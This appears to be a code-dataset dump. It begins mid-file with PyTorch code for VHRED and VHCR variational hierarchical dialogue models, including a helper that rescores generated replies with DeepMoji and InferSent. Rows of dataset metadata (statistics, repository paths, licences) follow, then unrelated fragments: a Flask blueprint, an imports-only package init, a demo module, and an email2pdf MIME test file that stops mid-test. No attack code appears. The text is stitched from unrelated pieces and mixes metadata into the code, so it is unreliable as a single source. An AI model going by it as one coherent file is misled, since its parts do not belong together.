            return (prediction, kl_div, log_p_z, log_q_zx,
                    emoji_preds, infersent_preds)

    def generate(self, context, sentence_length, n_context,
                 extra_context_inputs=None, botmoji=None, botsent=None,
                 vocab=None):
        """Condition on n_context turns, then sample n_sample_step responses
        using z_sent drawn from the prior, feeding each response back in as
        the next context turn.

        Args:
            context: [batch_size, n_context, seq_len] token ids.
        Returns:
            samples: [batch_size, n_sample_step, max_unroll] generated ids.
        """
        batch_size = context.size(0)
        samples = []

        # Run for context
        context_hidden = None
        for i in range(n_context):
            # encoder_outputs: [batch_size, seq_len, hidden_size * direction]
            # encoder_hidden: [num_layers * direction, batch_size, hidden_size]
            encoder_outputs, raw_encoder_hidden = self.encoder(context[:, i, :],
                                                               sentence_length[:, i])
            context_inputs_2d = raw_encoder_hidden.transpose(
                1, 0).contiguous().view(batch_size, -1)
            if self.config.context_input_only:
                context_inputs_2d = torch.cat(
                    (context_inputs_2d, extra_context_inputs), 1)

            # context_outputs: [batch_size, 1, context_hidden_size * direction]
            # context_hidden: [num_layers * direction, batch_size, context_hidden_size]
            context_outputs, context_hidden = self.context_encoder.step(context_inputs_2d,
                                                                        context_hidden)

        # Run for generation
        for j in range(self.config.n_sample_step):
            # context_outputs: [batch_size, context_hidden_size * direction]
            context_outputs = context_outputs.squeeze(1)
            mu_prior, var_prior = self.prior(context_outputs)
            eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
            z_sent = mu_prior + torch.sqrt(var_prior) * eps
            latent_context = torch.cat([context_outputs, z_sent], 1)
            decoder_init = self.context2decoder(latent_context)
            decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
            if self.config.sample:
                # NOTE(review): unlike VHCR.generate, decode=True is not
                # passed here — confirm the decoder's default makes this
                # sample rather than teacher-force.
                prediction = self.decoder(None, decoder_init)
                p = prediction.data.cpu().numpy()
                length = torch.from_numpy(np.where(p == EOS_ID)[1])
            else:
                prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
                # Keep only the top beam.
                # prediction: [batch_size, seq_len]
                prediction = prediction[:, 0, :]

                # length: [batch_size]
                length = [l[0] for l in length]
                length = to_var(torch.LongTensor(length))

            samples.append(prediction)

            # Re-encode the generated response as the next context input.
            encoder_outputs, raw_encoder_hidden = self.encoder(prediction,
                                                               length)
            context_inputs_2d = raw_encoder_hidden.transpose(
                1, 0).contiguous().view(batch_size, -1)

            # Dynamically assess the DeepMoji and Infersent predictions on
            # generated text
            if self.config.context_input_only:
                dynamic_context_inputs = dynamically_assess_context_inputs(
                    prediction, botmoji, botsent, vocab, self.config)
                context_inputs_2d = torch.cat(
                    (context_inputs_2d, dynamic_context_inputs), 1)

            context_outputs, context_hidden = self.context_encoder.step(context_inputs_2d,
                                                                        context_hidden)

        samples = torch.stack(samples, 1)
        return samples
class VHCR(nn.Module):
    """Variational Hierarchical Conversation RNN.

    Extends VHRED with a conversation-level latent z_conv (standard-Gaussian
    prior, posterior from a bidirectional inference RNN over all utterances)
    in addition to the per-utterance z_sent. z_conv initializes the context
    RNN and is concatenated to its inputs; the decoder is initialized from
    [context; z_sent; z_conv]. Supports utterance drop regularization via a
    learned "unknown sentence" vector.
    """

    def __init__(self, config):
        super(VHCR, self).__init__()
        self.config = config
        # Per-utterance encoder.
        self.encoder = layers.EncoderRNN(config.vocab_size,
                                         config.embedding_size,
                                         config.encoder_hidden_size,
                                         config.rnn,
                                         config.num_layers,
                                         config.bidirectional,
                                         config.dropout)

        # Per-sentence input size to the (bidirectional) inference RNN.
        context_inference_size = (config.num_layers
                                  * config.encoder_hidden_size
                                  * self.encoder.num_directions)
        # Sentence posterior sees utterance encoding + context + z_conv.
        posterior_input_size = (config.num_layers
                                * config.encoder_hidden_size
                                * self.encoder.num_directions
                                + config.context_size
                                + config.z_conv_size)
        if config.context_input_only:
            context_inference_size += (config.emo_output_size
                                       + config.infersent_output_size)
            posterior_input_size += (config.emo_output_size
                                     + config.infersent_output_size)

        # The context RNN additionally receives z_conv at every step.
        context_encoder_size = context_inference_size + config.z_conv_size
        self.context_encoder = layers.ContextRNN(context_encoder_size,
                                                 config.context_size,
                                                 config.rnn,
                                                 config.num_layers,
                                                 config.dropout)

        # Learned replacement vector for dropped utterances (sentence_drop).
        self.unk_sent = nn.Parameter(torch.randn(context_encoder_size - config.z_conv_size))

        # Maps z_conv to the context RNN's initial hidden state.
        self.z_conv2context = layers.FeedForward(config.z_conv_size,
                                                 config.num_layers * config.context_size,
                                                 num_layers=1,
                                                 activation=config.activation)

        # Bidirectional RNN over all utterances; its final state
        # parameterizes the z_conv posterior.
        self.context_inference = layers.ContextRNN(context_inference_size,
                                                   config.context_size,
                                                   config.rnn,
                                                   config.num_layers,
                                                   config.dropout,
                                                   bidirectional=True)

        self.decoder = layers.DecoderRNN(config.vocab_size,
                                         config.embedding_size,
                                         config.decoder_hidden_size,
                                         config.rnncell,
                                         config.num_layers,
                                         config.dropout,
                                         config.word_drop,
                                         config.max_unroll,
                                         config.sample,
                                         config.temperature,
                                         config.beam_size)

        # Decoder init from [context; z_sent; z_conv].
        self.context2decoder = layers.FeedForward(
            config.context_size + config.z_sent_size + config.z_conv_size,
            config.num_layers * config.decoder_hidden_size,
            num_layers=1,
            activation=config.activation)

        # Softplus keeps predicted variances positive.
        self.softplus = nn.Softplus()

        # z_conv posterior network.
        self.conv_posterior_h = layers.FeedForward(
            config.num_layers * self.context_inference.num_directions * config.context_size,
            config.context_size,
            num_layers=2,
            hidden_size=config.context_size,
            activation=config.activation)
        self.conv_posterior_mu = nn.Linear(config.context_size,
                                           config.z_conv_size)
        self.conv_posterior_var = nn.Linear(config.context_size,
                                            config.z_conv_size)

        # z_sent prior network p(z_sent | context, z_conv).
        self.sent_prior_h = layers.FeedForward(config.context_size + config.z_conv_size,
                                               config.context_size,
                                               num_layers=1,
                                               hidden_size=config.z_sent_size,
                                               activation=config.activation)
        self.sent_prior_mu = nn.Linear(config.context_size,
                                       config.z_sent_size)
        self.sent_prior_var = nn.Linear(config.context_size,
                                        config.z_sent_size)

        # z_sent posterior network q(z_sent | context, utterance, z_conv).
        self.sent_posterior_h = layers.FeedForward(
            posterior_input_size,
            config.context_size,
            num_layers=2,
            hidden_size=config.context_size,
            activation=config.activation)
        self.sent_posterior_mu = nn.Linear(config.context_size,
                                           config.z_sent_size)
        self.sent_posterior_var = nn.Linear(config.context_size,
                                            config.z_sent_size)

        if config.tie_embedding:
            self.decoder.embedding = self.encoder.embedding

        if config.emotion:
            # Discriminator head: context state -> emoji distribution.
            self.context2emoji = layers.FeedForward(
                config.context_size, config.emo_output_size,
                num_layers=config.emo_num_layers,
                hidden_size=config.emo_embedding_size,
                activation=config.emo_activation)

        if config.infersent:
            # Discriminator head: context state -> InferSent embedding.
            self.context2infersent = layers.FeedForward(
                config.context_size, config.infersent_output_size,
                num_layers=config.infersent_num_layers,
                hidden_size=config.infersent_embedding_size,
                activation=config.infersent_activation,
                no_activation_last_layer=True)

    def conv_prior(self):
        # Standard gaussian prior (mu=0, var=1), broadcast against z_conv.
        return to_var(torch.FloatTensor([0.0])), to_var(torch.FloatTensor([1.0]))

    def conv_posterior(self, context_inference_hidden):
        """z_conv posterior from the inference RNN's final hidden state."""
        h_posterior = self.conv_posterior_h(context_inference_hidden)
        mu_posterior = self.conv_posterior_mu(h_posterior)
        var_posterior = self.softplus(self.conv_posterior_var(h_posterior))
        return mu_posterior, var_posterior

    def sent_prior(self, context_outputs, z_conv):
        # Context dependent prior
        h_prior = self.sent_prior_h(torch.cat([context_outputs, z_conv], dim=1))
        mu_prior = self.sent_prior_mu(h_prior)
        var_prior = self.softplus(self.sent_prior_var(h_prior))
        return mu_prior, var_prior

    def sent_posterior(self, context_outputs, encoder_hidden, z_conv):
        """z_sent posterior from context, utterance encoding, and z_conv."""
        h_posterior = self.sent_posterior_h(torch.cat([context_outputs, encoder_hidden, z_conv], 1))
        mu_posterior = self.sent_posterior_mu(h_posterior)
        var_posterior = self.softplus(self.sent_posterior_var(h_posterior))
        return mu_posterior, var_posterior

    def forward(self, sentences, sentence_length, input_conversation_length,
                target_sentences, decode=False, extra_context_inputs=None,
                rl_mode=False):
        """Encode conversations, sample z_conv and z_sent (posteriors during
        training, priors otherwise), and decode.

        Args:
            sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
                — includes one extra (target) utterance per conversation.
            target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
        Return:
            (decoder_outputs_or_prediction, kl_div, log_p_z, log_q_zx,
             emoji_preds, infersent_preds)
            decoder_outputs: (Variable, FloatTensor)
                - train: [batch_size, seq_len, vocab_size]
                - eval: [batch_size, seq_len]
        """
        batch_size = input_conversation_length.size(0)
        num_sentences = sentences.size(0) - batch_size
        max_len = input_conversation_length.data.max().item()

        # encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
        # encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
        encoder_outputs, raw_encoder_hidden = self.encoder(sentences,
                                                           sentence_length)

        # encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
        context_inputs_2d = raw_encoder_hidden.transpose(
            1, 0).contiguous().view(num_sentences + batch_size, -1)
        if self.config.context_input_only:
            context_inputs_2d = torch.cat(
                (context_inputs_2d, extra_context_inputs), 1)

        # pad and pack encoder_hidden
        # Each conversation contributes (length + 1) utterances here.
        start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
                                        input_conversation_length[:-1] + 1)), 0)

        # context_inputs: [batch_size, max_len + 1, num_layers * direction * hidden_size]
        context_inputs = torch.stack([pad(context_inputs_2d.narrow(0, s, l + 1), max_len + 1)
                                      for s, l in zip(start.data.tolist(),
                                                      input_conversation_length.data.tolist())], 0)

        # Shifted view used by the sentence posterior (next utterance).
        # context_inputs_inference: [batch_size, max_len, num_layers * direction * hidden_size]
        context_inputs_inference = context_inputs[:, 1:, :]
        context_inputs_inference_flat = torch.cat(
            [context_inputs_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])

        # context_inputs_input: [batch_size, max_len, num_layers * direction * hidden_size]
        context_inputs_input = context_inputs[:, :-1, :]

        # Standard Gaussian prior
        conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
        conv_mu_prior, conv_var_prior = self.conv_prior()

        if not rl_mode and not decode:
            # Training path: z_conv and z_sent from their posteriors.
            if self.config.sentence_drop > 0.0:
                # Randomly replace whole utterance vectors with the learned
                # unk_sent parameter (regularizes the context RNN).
                indices = np.where(np.random.rand(max_len) < self.config.sentence_drop)[0]
                if len(indices) > 0:
                    context_inputs_input[:, indices, :] = self.unk_sent

            # context_inference_outputs: [batch_size, max_len, num_directions * context_size]
            # context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
            context_inference_outputs, context_inference_hidden = self.context_inference(
                context_inputs, input_conversation_length + 1)

            # context_inference_hidden: [batch_size, num_layers * num_directions * hidden_size]
            context_inference_hidden = context_inference_hidden.transpose(
                1, 0).contiguous().view(batch_size, -1)
            conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
            z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
            log_q_zx_conv = normal_logpdf(z_conv, conv_mu_posterior, conv_var_posterior).sum()

            log_p_z_conv = normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
            kl_div_conv = normal_kl_div(conv_mu_posterior, conv_var_posterior,
                                        conv_mu_prior, conv_var_prior).sum()

            # z_conv initializes the context RNN and is appended per step.
            context_init = self.z_conv2context(z_conv).view(
                self.config.num_layers, batch_size, self.config.context_size)

            z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
                1)).expand(z_conv.size(0), max_len, z_conv.size(1))
            context_outputs, context_last_hidden = self.context_encoder(
                torch.cat([context_inputs_input, z_conv_expand], 2),
                input_conversation_length,
                hidden=context_init)

            # flatten outputs
            # context_outputs: [num_sentences, context_size]
            context_outputs = torch.cat([context_outputs[i, :l, :]
                                         for i, l in enumerate(input_conversation_length.data)])

            z_conv_flat = torch.cat(
                [z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
            sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
            eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))

            sent_mu_posterior, sent_var_posterior = self.sent_posterior(
                context_outputs, context_inputs_inference_flat, z_conv_flat)
            z_sent = sent_mu_posterior + torch.sqrt(sent_var_posterior) * eps
            log_q_zx_sent = normal_logpdf(z_sent, sent_mu_posterior, sent_var_posterior).sum()

            log_p_z_sent = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
            # kl_div: [num_sentences]
            kl_div_sent = normal_kl_div(sent_mu_posterior, sent_var_posterior,
                                        sent_mu_prior, sent_var_prior).sum()

            kl_div = kl_div_conv + kl_div_sent
            log_q_zx = log_q_zx_conv + log_q_zx_sent
            log_p_z = log_p_z_conv + log_p_z_sent
        else:
            # Inference / RL path: z_conv and z_sent from their priors.
            z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
            context_init = self.z_conv2context(z_conv).view(
                self.config.num_layers, batch_size, self.config.context_size)

            z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
                1)).expand(z_conv.size(0), max_len, z_conv.size(1))
            # context_outputs: [batch_size, max_len, context_size]
            context_outputs, context_last_hidden = self.context_encoder(
                torch.cat([context_inputs_input, z_conv_expand], 2),
                input_conversation_length,
                hidden=context_init)
            # flatten outputs
            # context_outputs: [num_sentences, context_size]
            context_outputs = torch.cat([context_outputs[i, :l, :]
                                         for i, l in enumerate(input_conversation_length.data)])

            z_conv_flat = torch.cat(
                [z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
            sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
            eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))

            z_sent = sent_mu_prior + torch.sqrt(sent_var_prior) * eps
            kl_div = None
            log_p_z = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
            log_p_z += normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
            log_q_zx = None

        # Predict emojis using discriminator.
        # NOTE(review): unlike HRED/VHRED, no .detach() is applied here even
        # when context_input_only is set — confirm this is intentional.
        emoji_preds = None
        if self.config.emotion:
            emoji_preds = self.context2emoji(context_outputs)

        # Predict sentence embeddings using discriminator.
        infersent_preds = None
        if self.config.infersent:
            infersent_preds = self.context2infersent(context_outputs)

        # expand z_conv to all associated sentences
        z_conv = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_conv_size)
                            for z, m in zip(z_conv, input_conversation_length)])
        # latent_context: [num_sentences, context_size + z_sent_size +
        # z_conv_size]
        latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
        decoder_init = self.context2decoder(latent_context)
        decoder_init = decoder_init.view(-1,
                                         self.decoder.num_layers,
                                         self.decoder.hidden_size)
        decoder_init = decoder_init.transpose(1, 0).contiguous()

        # train: [batch_size, seq_len, vocab_size]
        # eval: [batch_size, seq_len]
        if rl_mode or not decode:
            decoder_outputs = self.decoder(target_sentences,
                                           init_h=decoder_init,
                                           decode=decode)
            return (decoder_outputs, kl_div, log_p_z, log_q_zx,
                    emoji_preds, infersent_preds)
        else:
            # prediction: [batch_size, beam_size, max_unroll]
            prediction, final_score, length = self.decoder.beam_decode(
                init_h=decoder_init)
            return (prediction, kl_div, log_p_z, log_q_zx,
                    emoji_preds, infersent_preds)

    def generate(self, context, sentence_length, n_context,
                 extra_context_inputs=None, botmoji=None, botsent=None,
                 vocab=None):
        """Condition on n_context turns, then sample n_sample_step responses.

        z_conv is drawn from its posterior over the given context turns
        (not the prior); z_sent is drawn from its prior at each step.

        Args:
            context: [batch_size, n_context, seq_len] token ids.
        Returns:
            samples: [batch_size, n_sample_step, max_unroll] generated ids.
        """
        batch_size = context.size(0)
        samples = []

        # Run for context
        conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))

        # First pass: encode all context turns for the inference RNN.
        context_inputs_list = []
        for i in range(n_context):
            # encoder_outputs: [batch_size, seq_len, hidden_size * direction]
            # encoder_hidden: [num_layers * direction, batch_size, hidden_size]
            encoder_outputs, raw_encoder_hidden = self.encoder(context[:, i, :],
                                                               sentence_length[:, i])
            # encoder_hidden: [batch_size, num_layers * direction * hidden_size]
            context_inputs_2d = raw_encoder_hidden.transpose(
                1, 0).contiguous().view(batch_size, -1)
            if self.config.context_input_only:
                context_inputs_2d = torch.cat(
                    (context_inputs_2d, extra_context_inputs), 1)
            context_inputs_list.append(context_inputs_2d)

        context_inputs = torch.stack(context_inputs_list, 1)
        (context_inference_outputs,
         context_inference_hidden) = self.context_inference(
            context_inputs, to_var(torch.LongTensor([n_context] * batch_size)))
        context_inference_hidden = context_inference_hidden.transpose(
            1, 0).contiguous().view(batch_size, -1)
        conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
        z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps

        context_init = self.z_conv2context(z_conv).view(
            self.config.num_layers, batch_size, self.config.context_size)

        # Second pass: step the context RNN over the same turns, with z_conv.
        context_hidden = context_init
        for i in range(n_context):
            # encoder_outputs: [batch_size, seq_len, hidden_size * direction]
            # encoder_hidden: [num_layers * direction, batch_size, hidden_size]
            encoder_outputs, raw_encoder_hidden = self.encoder(context[:, i, :],
                                                               sentence_length[:, i])
            # encoder_hidden: [batch_size, num_layers * direction * hidden_size]
            context_inputs_2d = raw_encoder_hidden.transpose(
                1, 0).contiguous().view(batch_size, -1)
            if self.config.context_input_only:
                context_inputs_2d = torch.cat(
                    (context_inputs_2d, extra_context_inputs), 1)
            # NOTE(review): this append re-extends a list that has already
            # been consumed above — it appears to be dead code; confirm.
            context_inputs_list.append(context_inputs_2d)

            # context_outputs: [batch_size, 1, context_hidden_size * direction]
            # context_hidden: [num_layers * direction, batch_size, context_hidden_size]
            context_outputs, context_hidden = self.context_encoder.step(
                torch.cat([context_inputs_2d, z_conv], 1), context_hidden)

        # Run for generation
        for j in range(self.config.n_sample_step):
            # context_outputs: [batch_size, context_hidden_size * direction]
            context_outputs = context_outputs.squeeze(1)
            mu_prior, var_prior = self.sent_prior(context_outputs, z_conv)
            eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
            z_sent = mu_prior + torch.sqrt(var_prior) * eps
            latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
            decoder_init = self.context2decoder(latent_context)
            decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
            if self.config.sample:
                prediction = self.decoder(None, decoder_init, decode=True)
                p = prediction.data.cpu().numpy()
                length = torch.from_numpy(np.where(p == EOS_ID)[1])
            else:
                prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
                # Keep only the top beam.
                # prediction: [batch_size, seq_len]
                prediction = prediction[:, 0, :]

                # length: [batch_size]
                length = [l[0] for l in length]
                length = to_var(torch.LongTensor(length))

            samples.append(prediction)

            # Re-encode the generated response as the next context input.
            encoder_outputs, raw_encoder_hidden = self.encoder(prediction,
                                                               length)
            context_inputs_2d = raw_encoder_hidden.transpose(
                1, 0).contiguous().view(batch_size, -1)

            # Dynamically assess the DeepMoji and Infersent predictions on
            # generated text
            if self.config.context_input_only:
                dynamic_context_inputs = dynamically_assess_context_inputs(
                    prediction, botmoji, botsent, vocab, self.config)
                context_inputs_2d = torch.cat(
                    (context_inputs_2d, dynamic_context_inputs), 1)

            context_outputs, context_hidden = self.context_encoder.step(
                torch.cat([context_inputs_2d, z_conv], 1), context_hidden)

        samples = torch.stack(samples, 1)
        return samples
def dynamically_assess_context_inputs(gen_response, botmoji, botsent, vocab,
                                      config):
    """Re-compute DeepMoji and InferSent context features on generated text.

    Args:
        gen_response: tensor of generated token ids, reshaped to (-1, 30).
            NOTE(review): the decode length 30 is hard-coded here -- it
            presumably matches the decoder's max sequence length; confirm
            and consider reading it from ``config`` instead.
        botmoji: DeepMoji wrapper exposing ``encode(sentence)``.
        botsent: InferSent wrapper exposing ``encode(sentence)``.
        vocab: vocabulary exposing ``decode(token_id_list)``.
        config: experiment config; ``emo_output_size`` is used to build a
            uniform emoji distribution for empty sentences.

    Returns:
        FloatTensor of the emoji features concatenated with the sentence
        embedding features along dim 1, one row per generated response.

    Raises:
        Exception: any encoding failure is logged and re-raised.  The
            previous code swallowed the error and fell through to the
            return statement, which then crashed with a ``NameError`` on
            the undefined result tensors, masking the real failure.
    """
    gen_response = gen_response.view(-1, 30).cpu().numpy()
    # Translate token ids to words and detokenize into plain sentences.
    decoded_response = [vocab.decode(list(g)) for g in gen_response]
    decoded_response = [detokenize(d) for d in decoded_response]
    # Assess DeepMoji and InferSent on the decoded text.
    try:
        infersent_sentences = to_var(torch.FloatTensor(
            [botsent.encode(s) for s in decoded_response]))
        # DeepMoji cannot score an empty string; fall back to a uniform
        # distribution over the emoji classes.
        blank_deepmoji = [1.0 / config.emo_output_size] * config.emo_output_size
        emoji_sentences = to_var(torch.FloatTensor(
            [botmoji.encode(s) if s != '' else blank_deepmoji for s in decoded_response]))
    except Exception as e:
        # Log and re-raise: returning here would reference undefined names.
        print("Error in dynamic context inputs:")
        print(str(e))
        raise
    return torch.cat((emoji_sentences, infersent_sentences), 1)
| 48.781124
| 127
| 0.572367
| 5,129
| 48,586
| 5.069019
| 0.050107
| 0.048002
| 0.026809
| 0.023886
| 0.883188
| 0.857879
| 0.830686
| 0.810531
| 0.792992
| 0.774107
| 0
| 0.007279
| 0.352447
| 48,586
| 995
| 128
| 48.830151
| 0.819083
| 0.137406
| 0
| 0.750371
| 0
| 0
| 0.000962
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02526
| false
| 0
| 0.007429
| 0.001486
| 0.063893
| 0.002972
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc2659709eefdbd31922fdc217b27bac8b7aabca
| 158
|
py
|
Python
|
blog/modules/profile/__init__.py
|
feel-easy/flask_blog
|
dd4f9b1bec85e32fa4080f638e2b7034ad16ef4c
|
[
"Apache-2.0"
] | 1
|
2019-03-19T11:00:44.000Z
|
2019-03-19T11:00:44.000Z
|
blog/modules/profile/__init__.py
|
feel-easy/flask_blog
|
dd4f9b1bec85e32fa4080f638e2b7034ad16ef4c
|
[
"Apache-2.0"
] | 6
|
2021-03-18T22:44:46.000Z
|
2022-03-11T23:42:59.000Z
|
blog/modules/profile/__init__.py
|
feel-easy/flask_blog
|
dd4f9b1bec85e32fa4080f638e2b7034ad16ef4c
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint
# Blueprint for the user-profile module; every route it registers is
# mounted under the /user URL prefix.
profile_blue = Blueprint('profile_blue', __name__, url_prefix='/user')
# RESTful: representational state transfer -- the architectural style web
# projects should follow.  (Translated from the original Chinese comment.)
# Imported at the bottom, presumably so that `views` can import
# `profile_blue` without a circular import -- confirm against views.py.
from . import views
| 19.75
| 70
| 0.78481
| 19
| 158
| 6.157895
| 0.736842
| 0.273504
| 0.34188
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113924
| 158
| 7
| 71
| 22.571429
| 0.835714
| 0.208861
| 0
| 0
| 0
| 0
| 0.138211
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
fc9a532c09486e975b6bbdda439c73f79bd7de86
| 132
|
py
|
Python
|
code/frameworks/pisr/utils/__init__.py
|
wukailu/EDSR-PyTorch
|
5625cf83ce88050b68e649beb4155b32c38018fa
|
[
"MIT"
] | null | null | null |
code/frameworks/pisr/utils/__init__.py
|
wukailu/EDSR-PyTorch
|
5625cf83ce88050b68e649beb4155b32c38018fa
|
[
"MIT"
] | null | null | null |
code/frameworks/pisr/utils/__init__.py
|
wukailu/EDSR-PyTorch
|
5625cf83ce88050b68e649beb4155b32c38018fa
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .utils import *
| 18.857143
| 38
| 0.848485
| 17
| 132
| 5.764706
| 0.470588
| 0.306122
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 132
| 6
| 39
| 22
| 0.859649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5d91496cb7c84a173933bb615d89b056740283dc
| 116
|
py
|
Python
|
accepted/chennaipy/october/samplecode/explicitimports/bar.py
|
tasdikrahman/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2017-04-16T06:59:02.000Z
|
2017-04-16T06:59:02.000Z
|
accepted/chennaipy/october/samplecode/explicitimports/bar.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | null | null | null |
accepted/chennaipy/october/samplecode/explicitimports/bar.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2019-10-26T00:28:07.000Z
|
2019-10-26T00:28:07.000Z
|
# explicitimports/bar.py
# Demo module for a talk on explicit (relative) imports: defines a class,
# prints a marker so the audience can see exactly when this module's body
# executes, then imports a sibling module from the same package.
class Bar(object):
    # Intentionally empty -- only the class's existence matters for the demo.
    pass
print("inside 'explicitimports/bar.py'")
# Explicit relative import of the sibling module; placed at the bottom,
# presumably to illustrate import-order / circular-import behavior between
# bar and foo -- confirm against foo.py.
from . import foo
| 11.6
| 40
| 0.706897
| 15
| 116
| 5.466667
| 0.733333
| 0.439024
| 0.487805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163793
| 116
| 9
| 41
| 12.888889
| 0.845361
| 0.189655
| 0
| 0
| 0
| 0
| 0.340659
| 0.263736
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
5d93fde8b2e8402fa6de12253767d21ce8278b91
| 17,136
|
py
|
Python
|
tests/Subprocess/test_Subprocess_MIME.py
|
pyscioffice/email2pdf
|
584833e86113c2957583403bb7c0d7f8ebea755b
|
[
"MIT"
] | 1
|
2022-03-10T20:36:16.000Z
|
2022-03-10T20:36:16.000Z
|
tests/Subprocess/test_Subprocess_MIME.py
|
pyscioffice/email2pdf
|
584833e86113c2957583403bb7c0d7f8ebea755b
|
[
"MIT"
] | null | null | null |
tests/Subprocess/test_Subprocess_MIME.py
|
pyscioffice/email2pdf
|
584833e86113c2957583403bb7c0d7f8ebea755b
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from email.mime.multipart import MIMEMultipart
import os
import tempfile
from tests.BaseTestClasses import Email2PDFTestCase
class TestMIME(Email2PDFTestCase):
def setUp(self):
super(TestMIME, self).setUp()
self.msg = MIMEMultipart()
def test_noheaders(self):
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_simple(self):
self.addHeaders()
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_nosubject(self):
self.addHeaders(Email2PDFTestCase.DEFAULT_FROM, Email2PDFTestCase.DEFAULT_TO, None)
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_html(self):
self.addHeaders()
self.attachHTML("<p>Some basic textual content</p>")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some\sbasic\stextual\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_attachtext_upsidedown(self):
self.addHeaders()
self.attachText("ɯɐɹƃoɹd ɟpdᄅlᴉɐɯǝ ǝɥʇ ɟo ʇsǝʇ ɐ sᴉ sᴉɥʇ ollǝH")
(rc, output, error) = self.invokeAsSubprocess()
